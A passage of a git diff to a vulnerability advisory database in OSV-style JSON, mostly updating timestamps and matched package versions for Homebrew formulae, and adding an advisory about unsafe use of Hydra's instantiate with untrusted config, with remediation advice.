"uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-dstack-CVE-2020-7695.json b/advisories/BREW-dstack-CVE-2020-7695.json index 01c81245e73..9a3e9d51f41 100644 --- a/advisories/BREW-dstack-CVE-2020-7695.json +++ b/advisories/BREW-dstack-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2020-7695", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-17T17:03:06Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-dstack-CVE-2021-20270.json b/advisories/BREW-dstack-CVE-2021-20270.json index c1120c9d31c..b00e2e9f8e7 100644 --- a/advisories/BREW-dstack-CVE-2021-20270.json +++ b/advisories/BREW-dstack-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2021-20270", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-dstack-CVE-2021-27291.json b/advisories/BREW-dstack-CVE-2021-27291.json index a85d15fa922..f8824cc2f68 100644 --- a/advisories/BREW-dstack-CVE-2021-27291.json +++ b/advisories/BREW-dstack-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2021-27291", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-dstack-CVE-2022-40896.json b/advisories/BREW-dstack-CVE-2022-40896.json index e384344bdb7..06e0d2fbd56 100644 --- a/advisories/BREW-dstack-CVE-2022-40896.json +++ b/advisories/BREW-dstack-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2022-40896", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-dstack-CVE-2024-3651.json b/advisories/BREW-dstack-CVE-2024-3651.json index 22774001f13..5fe755930d2 100644 --- a/advisories/BREW-dstack-CVE-2024-3651.json +++ b/advisories/BREW-dstack-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2024-3651", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-dstack-CVE-2026-28684.json b/advisories/BREW-dstack-CVE-2026-28684.json index 6ae9eec173b..071d25d9665 100644 --- a/advisories/BREW-dstack-CVE-2026-28684.json +++ b/advisories/BREW-dstack-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2026-28684", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-dstack-CVE-2026-4539.json b/advisories/BREW-dstack-CVE-2026-4539.json index 7c51ae9e48b..2bb0e4b72a8 100644 --- a/advisories/BREW-dstack-CVE-2026-4539.json +++ b/advisories/BREW-dstack-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2026-4539", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-dstack-CVE-2026-45409.json b/advisories/BREW-dstack-CVE-2026-45409.json index 22df48e78ee..e41289ad487 100644 --- a/advisories/BREW-dstack-CVE-2026-45409.json +++ b/advisories/BREW-dstack-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2026-45409", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-dstack-CVE-2026-59939.json b/advisories/BREW-dstack-CVE-2026-59939.json index 52b3fe2dc9a..3496c49d38a 100644 --- a/advisories/BREW-dstack-CVE-2026-59939.json +++ b/advisories/BREW-dstack-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2026-59939", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-duplicity-CVE-2026-59939.json b/advisories/BREW-duplicity-CVE-2026-59939.json index 9a1ca3344e7..27c680ce668 100644 --- a/advisories/BREW-duplicity-CVE-2026-59939.json +++ b/advisories/BREW-duplicity-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-duplicity-CVE-2026-59939", "published": "2026-08-13T16:44:03Z", - "modified": "2026-08-13T16:44:03Z", + "modified": "2026-08-22T08:46:38Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-dvc-CVE-2026-59939.json b/advisories/BREW-dvc-CVE-2026-59939.json index 2663f650548..e743d1241f3 100644 --- a/advisories/BREW-dvc-CVE-2026-59939.json +++ b/advisories/BREW-dvc-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dvc-CVE-2026-59939", "published": "2026-08-13T16:44:03Z", - "modified": "2026-08-13T16:44:03Z", + "modified": "2026-08-22T08:46:38Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-dvc-CVE-2026-68508.json b/advisories/BREW-dvc-CVE-2026-68508.json new file mode 100644 index 00000000000..fc3ccc1a92d --- /dev/null +++ b/advisories/BREW-dvc-CVE-2026-68508.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-dvc-CVE-2026-68508", + "published": "2026-08-22T08:46:38Z", + "modified": "2026-08-22T08:46:38Z", + "upstream": [ + "GHSA-2cp2-2r3c-7p7r", + "CVE-2026-68508" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "dvc", + "purl": "pkg:brew/dvc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.67.1_14" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.3.4", + "resource": "hydra-core", + "resource_purl": "pkg:pypi/hydra-core@1.3.5" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "hydra-core", + "subject_version": "1.3.5", + "key": "pkg:pypi/hydra-core@1.3.5", + "resource": "hydra-core" + } + ] + }, + "summary": "Hydra: hydra.utils.instantiate with untrusted config can lead to code execution", + "details": "## Summary\n\n`hydra.utils.instantiate()` resolves and calls Python objects from config. If an\napplication passes untrusted config to `instantiate()`, an attacker who controls\n`_target_` and its arguments can cause arbitrary code execution in the consuming\nprocess.\n\nHydra is not a network service. Exploitation requires a consuming application,\nlibrary, or user workflow to load attacker-controlled config, CLI overrides, or\nmodel metadata and pass it to `hydra.utils.instantiate()`.\n\n## Details\n\nHydra's instantiate API is designed to construct objects and call functions from\nconfiguration. For example:\n\n```yaml\ncomponent:\n _target_: package.module.Class\n arg: value\n```\n\nWhen this config is passed to `hydra.utils.instantiate()`, Hydra resolves\n`_target_` and calls it with the provided arguments.\n\nThis is intended for trusted application configuration. However, if untrusted\ninput controls `_target_`, the config becomes a callable-selection mechanism. A\nmalicious config can select a callable capable of executing code or commands and\nprovide attacker-controlled arguments.\n\nThis issue is the same general class of problem discussed by Unit 42 for\ndownstream AI/ML libraries such as NVIDIA NeMo, where untrusted model metadata\nwas passed into Hydra instantiate:\n\nhttps://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/\n\nHydra 1.3.4 includes a blacklist for some dangerous `_target_` values. That\nblacklist is defense-in-depth and is not a complete security boundary. The\nblacklist is not present in the released `hydra-core` 1.3.3 package, so this\nissue should not be described as a bypass of a released 1.3.3 blacklist.\n\n## Impact\n\nA successful attack can execute code in the process that calls\n`hydra.utils.instantiate()`. The impact is limited to the privileges and\nenvironment of that process.\n\nPotential impact includes:\n\n- Reading files, credentials, environment variables, or data accessible to the\n process\n- Modifying files, outputs, checkpoints, or application state writable by the\n process\n- Terminating or disrupting the process\n\n## Affected Usage\n\nApplications and libraries are affected when they pass untrusted or semi-trusted\nconfig, model metadata, CLI overrides, or other externally controlled data to\n`hydra.utils.instantiate()` without constraining which targets may be\ninstantiated.\n\nTrusted application-owned configuration is not affected in the same way.\n\n## Remediation\n\nHydra 1.3.4 hardens the existing behavior by adding a blacklist of obvious\ndangerous targets. It is a substantial security improvement, and users remaining\non the 1.3 release line should upgrade to 1.3.4 or a newer version.\n\nThe unreleased Hydra 1.4 development line uses an allowlist-based instantiation\nmodel that fully addresses this vulnerability class. The allowlist must come\nfrom trusted application code or another trusted channel, not from the untrusted\nconfig being instantiated.\n\nApplications that consume untrusted or semi-trusted config should not pass it\ndirectly to `hydra.utils.instantiate()`. They should validate `_target_` values\nagainst a trusted allowlist before instantiation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/hydra-ecosystem/hydra/security/advisories/GHSA-2cp2-2r3c-7p7r" + }, + { + "type": "WEB", + "url": "https://github.com/hydra-ecosystem/hydra/issues/3259" + }, + { + "type": "WEB", + "url": "https://github.com/hydra-ecosystem/hydra/pull/3261" + }, + { + "type": "WEB", + "url": "https://github.com/hydra-ecosystem/hydra/commit/7faad0dcedfb4c0a364aa1067c0080fd6fdf8dca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hydra-ecosystem/hydra" + }, + { + "type": "WEB", + "url": "https://github.com/hydra-ecosystem/hydra/releases/tag/v1.3.4" + } + ] +} diff --git a/advisories/BREW-esphome-CVE-2015-8557.json b/advisories/BREW-esphome-CVE-2015-8557.json index 1f1f1a28996..2eaa9f14ed1 100644 --- a/advisories/BREW-esphome-CVE-2015-8557.json +++ b/advisories/BREW-esphome-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2015-8557", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-esphome-CVE-2021-20270.json b/advisories/BREW-esphome-CVE-2021-20270.json index 8d1eaa3c774..32f7cc234e7 100644 --- a/advisories/BREW-esphome-CVE-2021-20270.json +++ b/advisories/BREW-esphome-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2021-20270", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-esphome-CVE-2021-27291.json b/advisories/BREW-esphome-CVE-2021-27291.json index 33891210ff8..209c49af0c0 100644 --- a/advisories/BREW-esphome-CVE-2021-27291.json +++ b/advisories/BREW-esphome-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2021-27291", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-esphome-CVE-2021-41104.json b/advisories/BREW-esphome-CVE-2021-41104.json index 458602f03b2..46a32967eae 100644 --- a/advisories/BREW-esphome-CVE-2021-41104.json +++ b/advisories/BREW-esphome-CVE-2021-41104.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2021-41104", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "PYSEC-2021-351", "CVE-2021-41104", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2022-40896.json b/advisories/BREW-esphome-CVE-2022-40896.json index 7f92436609f..d78cdd2334f 100644 --- a/advisories/BREW-esphome-CVE-2022-40896.json +++ b/advisories/BREW-esphome-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2022-40896", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-esphome-CVE-2024-27081.json b/advisories/BREW-esphome-CVE-2024-27081.json index 6d8c1a79440..f700560328c 100644 --- a/advisories/BREW-esphome-CVE-2024-27081.json +++ b/advisories/BREW-esphome-CVE-2024-27081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2024-27081", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "CVE-2024-27081", "GHSA-8p25-3q46-8q2p", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2024-27287.json b/advisories/BREW-esphome-CVE-2024-27287.json index 4555fcc1180..57ab5ada595 100644 --- a/advisories/BREW-esphome-CVE-2024-27287.json +++ b/advisories/BREW-esphome-CVE-2024-27287.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2024-27287", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "CVE-2024-27287", "GHSA-9p43-hj5j-96h5", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2024-29019.json b/advisories/BREW-esphome-CVE-2024-29019.json index 4c7b9d67259..365a333e593 100644 --- a/advisories/BREW-esphome-CVE-2024-29019.json +++ b/advisories/BREW-esphome-CVE-2024-29019.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2024-29019", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "CVE-2024-29019", "GHSA-5925-88xh-6h99", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2024-3651.json b/advisories/BREW-esphome-CVE-2024-3651.json index 4c95fa2d67a..d8f14fb6916 100644 --- a/advisories/BREW-esphome-CVE-2024-3651.json +++ b/advisories/BREW-esphome-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2024-3651", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-esphome-CVE-2025-57808.json b/advisories/BREW-esphome-CVE-2025-57808.json index 34bc926e1b0..f89b8fbc235 100644 --- a/advisories/BREW-esphome-CVE-2025-57808.json +++ b/advisories/BREW-esphome-CVE-2025-57808.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2025-57808", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "CVE-2025-57808", "GHSA-mxh2-ccgj-8635", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2025-68146.json b/advisories/BREW-esphome-CVE-2025-68146.json index 7f545eae326..33ee8485136 100644 --- 